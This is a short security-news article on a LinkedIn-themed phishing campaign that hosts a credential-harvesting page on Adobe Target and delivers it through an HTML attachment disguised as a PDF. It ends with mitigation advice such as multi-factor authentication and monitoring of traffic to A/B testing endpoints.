LinkedIn-Themed Phishing Abuses Adobe’s A/B Testing Platform

Credential‑theft phishing continues to evolve, and this latest LinkedIn‑themed campaign illustrates how attackers weaponize reputable third‑party platforms. By embedding a malicious HTML file disguised as a PDF, the lure appears credible to busy professionals accustomed to receiving partnership proposals on LinkedIn. Once the attachment is opened, victims encounter a familiar login screen that silently forwards their passwords to a remote server, a classic man‑in‑the‑middle approach that leverages social engineering and brand trust to increase success rates.

The technical sophistication lies in the use of Adobe Target, a legitimate A/B testing service that hosts the phishing page on an omtrdc.net subdomain. This choice serves two purposes: it cloaks malicious traffic behind Adobe’s well‑known certificate, and it provides attackers with built‑in analytics to track which recipients click and submit credentials. Double extensions and heavily obfuscated HTML further evade static scanning tools, while pre‑filled email fields create a personalized feel that reduces user hesitation. Such abuse of trusted infrastructure makes detection harder for traditional email gateways and endpoint solutions.

Organizations can mitigate this threat by enforcing multi‑factor authentication for all critical accounts and training users to verify URLs rather than clicking links in unsolicited messages. Security teams should monitor outbound traffic to Adobe’s domains for anomalous patterns and consider web‑proxy policies that restrict direct access to A/B testing endpoints. Ultimately, a zero‑trust mindset—verifying every request regardless of source—combined with robust email filtering and user awareness will reduce the attack surface that campaigns like this exploit.